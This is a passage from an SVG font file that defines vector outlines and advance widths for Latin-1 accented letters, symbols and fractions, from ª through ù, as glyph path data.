<glyph unicode="&#xaa;" horiz-adv-x="909" d="M112 920q0 111 84.5 171t246.5 60h137v51q0 62 -29.5 94.5t-86.5 32.5q-66 0 -102 -26t-36 -73l-165 13l-1 6q-6 98 79 163t225 65q134 0 212.5 -71t78.5 -205v-314q0 -51 6 -95t20 -86h-177q-8 21 -13 44.5t-8 49.5q-33 -47 -88.5 -77.5t-133.5 -30.5q-119 0 -184 61 t-65 167zM287 924q0 -43 29 -65.5t88 -22.5q51 0 105 30t71 65v103h-136q-74 0 -115.5 -32t-41.5 -78z" />
<glyph unicode="&#xab;" horiz-adv-x="1025" d="M98 507v19l280 390h187l-240 -400l240 -399h-187zM432 507v19l280 390h187l-240 -400l240 -399h-187z" />
<glyph unicode="&#xac;" horiz-adv-x="1129" d="M126 634v171h835v-431h-200v260h-635z" />
<glyph unicode="&#xad;" horiz-adv-x="801" d="M113 510v225h564v-225h-564z" />
<glyph unicode="&#xae;" horiz-adv-x="1606" d="M86 729q0 315 207 531t503 216q295 0 502.5 -216t207.5 -531q0 -316 -208 -533t-502 -217q-296 0 -503 217t-207 533zM208 729q0 -264 171.5 -444.5t416.5 -180.5q244 0 415.5 180.5t171.5 444.5q0 263 -171.5 442.5t-415.5 179.5q-246 0 -417 -179.5t-171 -442.5z M501 316v850h281q151 0 238 -68t87 -194q0 -58 -29 -101.5t-85 -74.5q58 -30 84.5 -84.5t26.5 -128.5v-56q0 -41 3.5 -73.5t13.5 -53.5v-16h-155q-9 21 -11 61.5t-2 82.5v54q0 71 -33.5 105t-109.5 34h-158v-337h-151zM652 787h135q71 0 120.5 30t49.5 86q0 72 -39 101 t-136 29h-130v-246z" />
<glyph unicode="&#xaf;" horiz-adv-x="1028" d="M148 1292v165h731v-165h-731z" />
<glyph unicode="&#xb0;" horiz-adv-x="796" d="M126 1203q0 112 80.5 193t192.5 81q110 0 189 -81t79 -193q0 -113 -79 -192t-189 -79q-113 0 -193 79t-80 192zM273 1203q0 -53 37 -88.5t89 -35.5q51 0 86 35t35 89t-35 91t-86 37q-52 0 -89 -37t-37 -91z" />
<glyph unicode="&#xb1;" horiz-adv-x="1101" d="M90 715v232h333v363h256v-363h327v-232h-327v-383h-256v383h-333zM114 -43v228h834v-228h-834z" />
<glyph unicode="&#xb2;" horiz-adv-x="860" d="M108 1223q-6 106 82.5 181t236.5 75q144 0 223 -65t79 -183q0 -82 -53.5 -144.5t-178.5 -165.5l-109 -93l2 -6h346v-155h-622v155l309 252q60 50 77.5 83.5t17.5 74.5q0 39 -23.5 65.5t-72.5 26.5q-55 0 -83 -30t-28 -77h-201z" />
<glyph unicode="&#xb3;" horiz-adv-x="856" d="M95 893l2 6h201q0 -42 31.5 -65.5t91.5 -23.5q56 0 90 24t34 68q0 50 -35 77t-102 27h-111v133h111q62 0 92 24.5t30 70.5q0 38 -28.5 63.5t-83.5 25.5q-51 0 -79.5 -22t-28.5 -53h-200l-2 6q-6 101 82 162.5t222 61.5q152 0 240.5 -59.5t88.5 -169.5q0 -55 -35.5 -100.5 t-96.5 -70.5q70 -24 107.5 -71.5t37.5 -115.5q0 -112 -89.5 -174t-241.5 -62q-146 0 -240 62.5t-88 175.5z" />
<glyph unicode="&#xb4;" horiz-adv-x="727" d="M108 1212l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xb5;" horiz-adv-x="1264" d="M139 -416v1498h291v-620q0 -149 45 -202.5t135 -53.5q75 0 125 27.5t78 79.5v769h292v-1082h-272l-6 67q-44 -43 -100.5 -65.5t-123.5 -22.5q-51 0 -94.5 10.5t-78.5 33.5v-439h-291z" />
<glyph unicode="&#xb6;" horiz-adv-x="1078" d="M61 988q0 207 129.5 337.5t362.5 130.5h375v-1456h-292v520h-83q-233 0 -362.5 129.5t-129.5 338.5z" />
<glyph unicode="&#xb7;" horiz-adv-x="619" d="M159 568v260h292v-260h-292z" />
<glyph unicode="&#xb8;" horiz-adv-x="549" d="M97 -136l31 142h219l-11 -57q64 -11 107 -52t43 -121q0 -107 -91.5 -171t-259.5 -64l-7 161q51 0 81 20.5t30 62.5q0 41 -32 57.5t-110 21.5z" />
<glyph unicode="&#xb9;" horiz-adv-x="573" d="M78 1295v159l338 23v-812h-211v630h-127z" />
<glyph unicode="&#xba;" horiz-adv-x="937" d="M118 1025v117q0 148 94 241.5t252 93.5t252.5 -93.5t94.5 -241.5v-117q0 -149 -94 -241.5t-251 -92.5q-159 0 -253.5 92.5t-94.5 241.5zM293 1025q0 -85 44 -136.5t129 -51.5q82 0 126 51.5t44 136.5v117q0 83 -44.5 135t-127.5 52q-84 0 -127.5 -52t-43.5 -135v-117z " />
<glyph unicode="&#xbb;" horiz-adv-x="1025" d="M102 151l239 399l-239 400h188l280 -390v-19l-280 -390h-188zM448 151l239 399l-239 400h188l280 -390v-19l-280 -390h-188z" />
<glyph unicode="&#xbc;" horiz-adv-x="1493" d="M167 1294v159l338 23v-812h-211v630h-127zM309 192l711 1138l142 -75l-711 -1138zM762 265l424 536h211v-505h101v-157h-101v-139h-211v139h-410zM978 296h208v257l-6 2l-13 -20z" />
<glyph unicode="&#xbd;" horiz-adv-x="1553" d="M167 1294v159l338 23v-812h-211v630h-127zM322 192l711 1138l142 -75l-711 -1138zM919 556q-6 106 82.5 181t236.5 75q144 0 223 -65t79 -183q0 -82 -53.5 -144.5t-178.5 -165.5l-109 -93l2 -6h346v-155h-622v155l309 252q60 50 77.5 83.5t17.5 74.5q0 39 -23.5 65.5 t-72.5 26.5q-55 0 -83 -30t-28 -77h-201z" />
<glyph unicode="&#xbe;" horiz-adv-x="1717" d="M111 894l2 6h201q0 -42 31.5 -65.5t91.5 -23.5q56 0 90 24t34 68q0 50 -35 77t-102 27h-111v133h111q62 0 92 24.5t30 70.5q0 38 -28.5 63.5t-83.5 25.5q-51 0 -79.5 -22t-28.5 -53h-200l-2 6q-6 101 82 162.5t222 61.5q152 0 240.5 -59.5t88.5 -169.5 q0 -55 -35.5 -100.5t-96.5 -70.5q70 -24 107.5 -71.5t37.5 -115.5q0 -112 -89.5 -174t-241.5 -62q-146 0 -240 62.5t-88 175.5zM492 192l711 1138l142 -75l-711 -1138zM951 265l424 536h211v-505h101v-157h-101v-139h-211v139h-410zM1167 296h208v257l-6 2l-13 -20z" />
<glyph unicode="&#xbf;" horiz-adv-x="1037" d="M75 27q0 125 74 233t187 183q60 45 79.5 92.5t19.5 132.5h291q-2 -141 -42.5 -206.5t-159.5 -157.5q-72 -58 -114.5 -125.5t-42.5 -149.5q0 -90 48.5 -142t139.5 -52q73 0 124 43t54 128h283l2 -6q2 -191 -127.5 -292.5t-335.5 -101.5q-226 0 -353 113t-127 308zM433 831 v251h294v-251h-294z" />
<glyph unicode="&#xc0;" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM307 1820l2 6h309l197 -266h-237zM478 543h367l-180 572h-6z" />
<glyph unicode="&#xc1;" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM478 543h367l-180 572h-6zM519 1560l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xc2;" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM286 1592v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227zM478 543h367l-180 572h-6z" />
<glyph unicode="&#xc3;" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM281 1644q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5t-150.5 -67.5q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5zM478 543h367 l-180 572h-6z" />
<glyph unicode="&#xc4;" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM272 1601v204h266v-204h-266zM478 543h367l-180 572h-6zM772 1601v204h266v-204h-266z" />
<glyph unicode="&#xc5;" horiz-adv-x="1311" d="M12 0l501 1456h299l499 -1456h-295l-99 314h-511l-99 -314h-295zM444 1739q0 83 61.5 139.5t151.5 56.5q88 0 149 -56.5t61 -139.5q0 -84 -60.5 -138t-149.5 -54q-90 0 -151.5 54t-61.5 138zM478 543h367l-180 572h-6zM560 1739q0 -43 28 -70.5t69 -27.5t67.5 27.5 t26.5 70.5q0 44 -26.5 72t-67.5 28q-42 0 -69.5 -28.5t-27.5 -71.5z" />
<glyph unicode="&#xc6;" horiz-adv-x="1925" d="M3 0l784 1456h1016v-228h-596l16 -366h499v-227h-490l17 -408h616v-227h-898l-14 335h-440l-168 -335h-342zM633 575h310l-23 559l-6 1z" />
<glyph unicode="&#xc7;" horiz-adv-x="1309" d="M93 583v289q0 265 160 435t416 170q270 0 422 -138.5t148 -377.5l-2 -6h-284q0 144 -69 220.5t-215 76.5q-131 0 -208 -106.5t-77 -271.5v-291q0 -167 81 -273.5t219 -106.5q137 0 202.5 73.5t65.5 218.5h283l2 -6q4 -235 -143.5 -372.5t-409.5 -137.5q-263 0 -427 169 t-164 435zM524 -137l31 142h219l-11 -57q64 -11 107 -52t43 -121q0 -107 -91.5 -171t-259.5 -64l-7 161q51 0 81 20.5t30 62.5q0 41 -32 57.5t-110 21.5z" />
<glyph unicode="&#xc8;" horiz-adv-x="1176" d="M136 0v1456h995v-225h-703v-366h603v-225h-603v-416h705v-224h-997zM244 1820l2 6h309l197 -266h-237z" />
<glyph unicode="&#xc9;" horiz-adv-x="1176" d="M136 0v1456h995v-225h-703v-366h603v-225h-603v-416h705v-224h-997zM456 1560l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xca;" horiz-adv-x="1176" d="M136 0v1456h995v-225h-703v-366h603v-225h-603v-416h705v-224h-997zM238 1592v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227z" />
<glyph unicode="&#xcb;" horiz-adv-x="1176" d="M136 0v1456h995v-225h-703v-366h603v-225h-603v-416h705v-224h-997zM221 1601v204h266v-204h-266zM721 1601v204h266v-204h-266z" />
<glyph unicode="&#xcc;" horiz-adv-x="601" d="M-58 1820l2 6h309l197 -266h-237zM154 0v1456h292v-1456h-292z" />
<glyph unicode="&#xcd;" horiz-adv-x="601" d="M152 1560l199 266h309l2 -6l-277 -260h-233zM154 0v1456h292v-1456h-292z" />
<glyph unicode="&#xce;" horiz-adv-x="601" d="M-64 1592v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227zM154 0v1456h292v-1456h-292z" />
<glyph unicode="&#xcf;" horiz-adv-x="601" d="M-81 1601v204h266v-204h-266zM154 0v1456h292v-1456h-292zM419 1601v204h266v-204h-266z" />
<glyph unicode="&#xd0;" horiz-adv-x="1372" d="M31 652v181h135v623h500q267 0 440 -170.5t173 -437.5v-241q0 -268 -173 -437.5t-440 -169.5h-500v652h-135zM458 224h193q157 0 246 106t89 277v243q0 169 -89 275t-246 106h-193v-398h244v-181h-244v-428z" />
<glyph unicode="&#xd1;" horiz-adv-x="1450" d="M136 0v1456h292l588 -994l6 1v993h291v-1456h-291l-588 995l-6 -1v-994h-292zM349 1644q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5t-150.5 -67.5q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5z " />
<glyph unicode="&#xd2;" horiz-adv-x="1399" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -268 -169.5 -443t-440.5 -175q-269 0 -437 175t-168 443zM339 1820l2 6h309l197 -266h-237zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282v264q0 170 -85 279t-234 109 t-231 -108.5t-82 -279.5v-264z" />
<glyph unicode="&#xd3;" horiz-adv-x="1399" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -268 -169.5 -443t-440.5 -175q-269 0 -437 175t-168 443zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282v264q0 170 -85 279t-234 109t-231 -108.5t-82 -279.5v-264zM551 1581 l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xd4;" horiz-adv-x="1399" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -268 -169.5 -443t-440.5 -175q-269 0 -437 175t-168 443zM333 1613v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282 v264q0 170 -85 279t-234 109t-231 -108.5t-82 -279.5v-264z" />
<glyph unicode="&#xd5;" horiz-adv-x="1399" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -268 -169.5 -443t-440.5 -175q-269 0 -437 175t-168 443zM324 1665q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5t-150.5 -67.5 q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282v264q0 170 -85 279t-234 109t-231 -108.5t-82 -279.5v-264z" />
<glyph unicode="&#xd6;" horiz-adv-x="1399" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q271 0 441 -175.5t170 -442.5v-262q0 -268 -169.5 -443t-440.5 -175q-269 0 -437 175t-168 443zM316 1622v204h266v-204h-266zM383 597q0 -173 83 -282t231 -109q150 0 234 109t84 282v264q0 170 -85 279t-234 109t-231 -108.5 t-82 -279.5v-264zM816 1622v204h266v-204h-266z" />
<glyph unicode="&#xd7;" horiz-adv-x="1088" d="M64 371l309 315l-309 315l172 164l303 -310l304 310l172 -164l-309 -315l309 -315l-172 -164l-304 309l-303 -309z" />
<glyph unicode="&#xd8;" horiz-adv-x="1410" d="M92 597v262q0 267 167.5 442.5t436.5 175.5q100 0 188.5 -26.5t162.5 -74.5l83 142h143l-130 -223q79 -83 121.5 -195t42.5 -241v-262q0 -268 -169.5 -443t-440.5 -175q-79 0 -151 16t-133 47l-80 -137h-143l119 204q-104 83 -160.5 209.5t-56.5 278.5zM383 597 q0 -74 15.5 -137.5t45.5 -107.5l6 -1l468 803q-42 45 -98 70t-124 25q-149 0 -231 -108.5t-82 -279.5v-264zM535 251q33 -22 74 -33.5t88 -11.5q150 0 234 109t84 282v264q0 45 -7 87t-18 73l-6 1z" />
<glyph unicode="&#xd9;" horiz-adv-x="1407" d="M120 490v966h293v-966q0 -144 77 -215.5t212 -71.5q137 0 215 71t78 216v966h293v-966q0 -245 -162 -378t-424 -133q-261 0 -421.5 133t-160.5 378zM344 1820l2 6h309l197 -266h-237z" />
<glyph unicode="&#xda;" horiz-adv-x="1407" d="M120 490v966h293v-966q0 -144 77 -215.5t212 -71.5q137 0 215 71t78 216v966h293v-966q0 -245 -162 -378t-424 -133q-261 0 -421.5 133t-160.5 378zM556 1560l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xdb;" horiz-adv-x="1407" d="M120 490v966h293v-966q0 -144 77 -215.5t212 -71.5q137 0 215 71t78 216v966h293v-966q0 -245 -162 -378t-424 -133q-261 0 -421.5 133t-160.5 378zM338 1592v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227z" />
<glyph unicode="&#xdc;" horiz-adv-x="1407" d="M120 490v966h293v-966q0 -144 77 -215.5t212 -71.5q137 0 215 71t78 216v966h293v-966q0 -245 -162 -378t-424 -133q-261 0 -421.5 133t-160.5 378zM321 1601v204h266v-204h-266zM821 1601v204h266v-204h-266z" />
<glyph unicode="&#xdd;" horiz-adv-x="1292" d="M5 1456h320l318 -671h6l318 671h320l-500 -944v-512h-291v527zM504 1560l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xde;" horiz-adv-x="1247" d="M132 0v1456h292v-270h221q254 0 396 -124t142 -324q0 -201 -142 -325t-396 -124h-221v-289h-292zM424 514h221q123 0 184.5 63.5t61.5 158.5t-61.5 160t-184.5 65h-221v-447z" />
<glyph unicode="&#xdf;" horiz-adv-x="1294" d="M135 0v1101q0 226 129 349t352 123q180 0 299 -95.5t119 -271.5q0 -108 -53.5 -205.5t-53.5 -165.5q0 -56 150 -197.5t150 -281.5q0 -189 -115 -283t-332 -94q-81 0 -160.5 15t-118.5 41l55 223q39 -22 96 -38.5t122 -16.5q76 0 119 38t43 103q0 71 -150 205.5 t-150 276.5q0 90 54.5 190t54.5 175q0 68 -45 113t-103 45q-76 0 -123.5 -67.5t-47.5 -184.5v-1097h-291z" />
<glyph unicode="&#xe0;" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6q-7 137 119 236.5t331 99.5q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM184 1492l2 6h309l197 -266h-237zM346 315q0 -54 36 -87t98 -33q77 0 137 38t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5z" />
<glyph unicode="&#xe1;" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6q-7 137 119 236.5t331 99.5q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM346 315q0 -54 36 -87t98 -33q77 0 137 38t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5zM396 1232l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xe2;" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6q-7 137 119 236.5t331 99.5q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM178 1270v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227zM346 315q0 -54 36 -87t98 -33q77 0 137 38t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5z" />
<glyph unicode="&#xe3;" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6q-7 137 119 236.5t331 99.5q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM169 1322q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5t-150.5 -67.5q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5zM346 315q0 -54 36 -87t98 -33q77 0 137 38 t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5z" />
<glyph unicode="&#xe4;" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6q-7 137 119 236.5t331 99.5q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM161 1279v204h266v-204h-266zM346 315q0 -54 36 -87t98 -33q77 0 137 38t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5zM661 1279v204h266v-204h-266z" />
<glyph unicode="&#xe5;" horiz-adv-x="1100" d="M55 305q0 159 122.5 246.5t357.5 87.5h163v86q0 78 -41 121t-121 43q-71 0 -109.5 -34.5t-38.5 -95.5l-282 1l-1 6q-7 137 119 236.5t331 99.5q194 0 315 -98.5t121 -280.5v-447q0 -76 11.5 -143t36.5 -133h-292q-16 37 -27.5 78t-16.5 84q-45 -79 -118.5 -131 t-175.5 -52q-170 0 -262 87.5t-92 238.5zM332 1417q0 83 61.5 139.5t151.5 56.5q88 0 149 -56.5t61 -139.5q0 -84 -60.5 -138t-149.5 -54q-90 0 -151.5 54t-61.5 138zM346 315q0 -54 36 -87t98 -33q77 0 137 38t81 88v153h-163q-93 0 -141 -46.5t-48 -112.5zM448 1417 q0 -43 28 -70.5t69 -27.5t67.5 27.5t26.5 70.5q0 44 -26.5 72t-67.5 28q-42 0 -69.5 -28.5t-27.5 -71.5z" />
<glyph unicode="&#xe6;" horiz-adv-x="1729" d="M46 317q0 159 127 245t370 86h181v59q0 79 -41 124.5t-115 45.5q-81 0 -127 -37.5t-46 -93.5l-283 18l-2 6q-6 144 121.5 238t339.5 94q102 0 186 -27.5t143 -79.5q61 52 142.5 79.5t180.5 27.5q212 0 333 -132t121 -358v-158h-650l-2 -6q4 -112 66 -178.5t186 -66.5 q92 0 154 20t140 61l77 -184q-62 -48 -169 -84.5t-233 -36.5q-129 0 -229.5 40.5t-167.5 116.5q-60 -68 -161.5 -112.5t-240.5 -44.5q-192 0 -296.5 90.5t-104.5 247.5zM338 313q0 -59 41.5 -93.5t123.5 -34.5q58 0 121 30.5t100 72.5v176h-179q-98 0 -152.5 -44t-54.5 -107 zM1027 649l2 -5h362v28q0 94 -42.5 149.5t-125.5 55.5q-95 0 -142 -61.5t-54 -166.5z" />
<glyph unicode="&#xe7;" horiz-adv-x="1060" d="M62 525v30q0 239 130.5 393t372.5 154q200 0 322.5 -114t118.5 -300l-2 -6h-266q0 84 -46 139.5t-127 55.5q-116 0 -163.5 -90t-47.5 -232v-30q0 -145 47.5 -233.5t164.5 -88.5q78 0 125 45.5t47 121.5h265l3 -6q4 -164 -123.5 -274.5t-316.5 -110.5q-242 0 -373 153 t-131 393zM415 -137l31 142h219l-11 -57q64 -11 107 -52t43 -121q0 -107 -91.5 -171t-259.5 -64l-7 161q51 0 81 20.5t30 62.5q0 41 -32 57.5t-110 21.5z" />
<glyph unicode="&#xe8;" horiz-adv-x="1084" d="M77 510v40q0 241 132.5 397t355.5 155q219 0 340 -132t121 -357v-159h-646l-2 -6q8 -107 71.5 -176t172.5 -69q97 0 161 19.5t140 61.5l79 -180q-66 -54 -173 -89.5t-238 -35.5q-234 0 -374 150t-140 381zM186 1498l2 6h309l197 -266h-237zM379 652l3 -5h358v26 q0 93 -43.5 148.5t-131.5 55.5q-81 0 -128 -62t-58 -163z" />
<glyph unicode="&#xe9;" horiz-adv-x="1084" d="M77 510v40q0 241 132.5 397t355.5 155q219 0 340 -132t121 -357v-159h-646l-2 -6q8 -107 71.5 -176t172.5 -69q97 0 161 19.5t140 61.5l79 -180q-66 -54 -173 -89.5t-238 -35.5q-234 0 -374 150t-140 381zM379 652l3 -5h358v26q0 93 -43.5 148.5t-131.5 55.5 q-81 0 -128 -62t-58 -163zM398 1238l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xea;" horiz-adv-x="1084" d="M77 510v40q0 241 132.5 397t355.5 155q219 0 340 -132t121 -357v-159h-646l-2 -6q8 -107 71.5 -176t172.5 -69q97 0 161 19.5t140 61.5l79 -180q-66 -54 -173 -89.5t-238 -35.5q-234 0 -374 150t-140 381zM180 1271v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133 h-227zM379 652l3 -5h358v26q0 93 -43.5 148.5t-131.5 55.5q-81 0 -128 -62t-58 -163z" />
<glyph unicode="&#xeb;" horiz-adv-x="1084" d="M77 510v40q0 241 132.5 397t355.5 155q219 0 340 -132t121 -357v-159h-646l-2 -6q8 -107 71.5 -176t172.5 -69q97 0 161 19.5t140 61.5l79 -180q-66 -54 -173 -89.5t-238 -35.5q-234 0 -374 150t-140 381zM163 1280v204h266v-204h-266zM379 652l3 -5h358v26 q0 93 -43.5 148.5t-131.5 55.5q-81 0 -128 -62t-58 -163zM663 1280v204h266v-204h-266z" />
<glyph unicode="&#xec;" horiz-adv-x="562" d="M-78 1498l2 6h309l197 -266h-237zM133 0v1082h292v-1082h-292z" />
<glyph unicode="&#xed;" horiz-adv-x="562" d="M132 1217l199 266h309l2 -6l-277 -260h-233zM133 0v1082h292v-1082h-292z" />
<glyph unicode="&#xee;" horiz-adv-x="562" d="M-84 1251v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227zM133 0v1082h292v-1082h-292z" />
<glyph unicode="&#xef;" horiz-adv-x="562" d="M-101 1258v204h266v-204h-266zM133 0v1082h292v-1082h-292zM399 1258v204h266v-204h-266z" />
<glyph unicode="&#xf0;" horiz-adv-x="1218" d="M48 468q0 226 134.5 362.5t365.5 136.5q81 0 153 -25.5t124 -70.5l4 4q-14 83 -54 153.5t-100 125.5l-245 -136l-78 113l192 106l-1 6q-31 16 -68 30t-77 26l92 218q88 -19 168.5 -52.5t149.5 -80.5l198 109l77 -113l-162 -90q102 -106 158.5 -245t56.5 -303v-196 q0 -250 -157 -408.5t-392 -158.5q-238 0 -388.5 140.5t-150.5 348.5zM340 468q0 -112 68 -188.5t183 -76.5q116 0 184.5 96.5t68.5 246.5v118q-35 39 -99 65t-151 26q-122 0 -188 -79t-66 -208z" />
<glyph unicode="&#xf1;" d="M107 0v1082h272l13 -155q54 83 133 129t177 46q164 0 256 -103t92 -323v-676h-293v675q0 109 -44 154.5t-133 45.5q-58 0 -104 -23.5t-77 -66.5v-785h-292zM202 1322q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5 t-150.5 -67.5q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5z" />
<glyph unicode="&#xf2;" d="M67 530v21q0 242 135 396.5t374 154.5q240 0 376 -154t136 -397v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-240 0 -375.5 153.5t-135.5 397.5zM217 1498l2 6h309l197 -266h-237zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90t52.5 237v21q0 144 -53 235t-167 91 q-113 0 -165.5 -91.5t-52.5 -234.5v-21z" />
<glyph unicode="&#xf3;" d="M67 530v21q0 242 135 396.5t374 154.5q240 0 376 -154t136 -397v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-240 0 -375.5 153.5t-135.5 397.5zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90t52.5 237v21q0 144 -53 235t-167 91q-113 0 -165.5 -91.5t-52.5 -234.5 v-21zM429 1238l199 266h309l2 -6l-277 -260h-233z" />
<glyph unicode="&#xf4;" d="M67 530v21q0 242 135 396.5t374 154.5q240 0 376 -154t136 -397v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-240 0 -375.5 153.5t-135.5 397.5zM211 1270v26l282 240h169l287 -243v-23h-232l-140 133l-139 -133h-227zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90 t52.5 237v21q0 144 -53 235t-167 91q-113 0 -165.5 -91.5t-52.5 -234.5v-21z" />
<glyph unicode="&#xf5;" d="M67 530v21q0 242 135 396.5t374 154.5q240 0 376 -154t136 -397v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-240 0 -375.5 153.5t-135.5 397.5zM202 1322q0 94 59.5 163.5t149.5 69.5q56 0 152 -43.5t148 -43.5q34 0 60 32t26 79l154 -45q0 -96 -59.5 -163.5t-150.5 -67.5 q-70 0 -158.5 43.5t-140.5 43.5q-36 0 -60 -32.5t-24 -77.5zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90t52.5 237v21q0 144 -53 235t-167 91q-113 0 -165.5 -91.5t-52.5 -234.5v-21z" />
<glyph unicode="&#xf6;" d="M67 530v21q0 242 135 396.5t374 154.5q240 0 376 -154t136 -397v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-240 0 -375.5 153.5t-135.5 397.5zM194 1279v204h266v-204h-266zM358 530q0 -148 52 -237.5t168 -89.5q113 0 165.5 90t52.5 237v21q0 144 -53 235t-167 91 q-113 0 -165.5 -91.5t-52.5 -234.5v-21zM694 1279v204h266v-204h-266z" />
<glyph unicode="&#xf7;" horiz-adv-x="1168" d="M63 573v227h1029v-227h-1029zM432 164v233h293v-233h-293zM432 973v233h293v-233h-293z" />
<glyph unicode="&#xf8;" d="M67 530v21q0 242 135 396.5t374 154.5q50 0 96.5 -8t90.5 -22l70 143h161l-103 -211q95 -74 146 -191.5t51 -261.5v-21q0 -244 -135.5 -397.5t-374.5 -153.5q-48 0 -92 7t-84 19l-71 -146h-161l103 211q-101 71 -153.5 190.5t-52.5 269.5zM358 530q0 -62 8.5 -114 t26.5 -86l6 -1l260 531q-19 8 -39.5 12.5t-43.5 4.5q-113 0 -165.5 -91.5t-52.5 -234.5v-21zM505 215q15 -7 33.5 -9.5t39.5 -2.5q113 0 165.5 90t52.5 237v21q0 54 -8 102t-22 82l-6 1z" />
<glyph unicode="&#xf9;" d="M105 429v653h291v-655q0 -118 40 -169.5t118 -51.5q70 0 120 22.5t82 66.5v787h292v-1082h-249l-26 156q-50 -85 -127 -131t-177 -46q-171 0 -267.5 109.5t-96.5 340.5zM216 1477l2 6h309l197 -266h-237z" />
